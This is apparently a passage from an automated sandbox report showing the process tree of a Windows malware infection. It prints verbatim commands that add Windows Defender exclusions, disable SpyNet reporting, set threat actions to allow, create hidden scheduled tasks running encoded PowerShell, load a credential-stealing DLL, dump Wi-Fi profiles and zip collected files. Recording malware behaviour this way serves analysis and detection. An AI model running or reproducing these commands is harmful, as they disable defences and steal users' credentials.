                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3180
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS53F7.tmp\Install.exe
                                                                                              .\Install.exe /ydfmdidw "385118" /S
                                                                                              6⤵
                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Enumerates system info in registry
                                                                                              PID:4404
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                7⤵
                                                                                                  PID:5852
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                    8⤵
                                                                                                      PID:5140
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                        9⤵
                                                                                                          PID:5604
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                          9⤵
                                                                                                            PID:1612
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                        7⤵
                                                                                                          PID:5896
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                            8⤵
                                                                                                              PID:5416
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                9⤵
                                                                                                                  PID:5792
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                  9⤵
                                                                                                                    PID:4332
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "gnCBwhIZZ" /SC once /ST 10:00:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                7⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:6060
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "gnCBwhIZZ"
                                                                                                                7⤵
                                                                                                                  PID:5744
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /DELETE /F /TN "gnCBwhIZZ"
                                                                                                                  7⤵
                                                                                                                    PID:1568
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\gLKZBXU.exe\" id /Qwsite_idRvr 385118 /S" /V1 /F
                                                                                                                    7⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:3980
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4776
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1376
                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                              netsh wlan show profiles
                                                                                                              4⤵
                                                                                                                PID:1028
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\045580317372_Desktop.zip' -CompressionLevel Optimal
                                                                                                                4⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4868
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                            2⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Loads dropped DLL
                                                                                                            PID:392
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 3816
                                                                                                          1⤵
                                                                                                            PID:4504
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4240 -ip 4240
                                                                                                            1⤵
                                                                                                              PID:1468
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3580 -ip 3580
                                                                                                              1⤵
                                                                                                                PID:312
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4240 -ip 4240
                                                                                                                1⤵
                                                                                                                  PID:4804
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:2564
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:3332
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 976 -ip 976
                                                                                                                      1⤵
                                                                                                                        PID:5504
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                        1⤵
                                                                                                                          PID:3944
                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                            2⤵
                                                                                                                              PID:5844
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                            1⤵
                                                                                                                              PID:620
                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                2⤵
                                                                                                                                  PID:5440
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4440 -ip 4440
                                                                                                                                1⤵
                                                                                                                                  PID:1632
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3084
                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                    1⤵
                                                                                                                                      PID:5992
                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                      1⤵
                                                                                                                                        PID:2816
                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5552
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe id /QHsite_idTsk 385118 /S
                                                                                                                                          1⤵
                                                                                                                                            PID:3172
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                              2⤵
                                                                                                                                                PID:4216
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5772
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5656
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5056
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4824
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2340
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:212
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6100
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:920
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5592
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5124
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5664
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3680
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5128
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2792
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4628
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3836
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3536
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1288
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5368
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3764
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5860
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5688
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1568
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:872
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1692
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5420
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1120
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                          2⤵
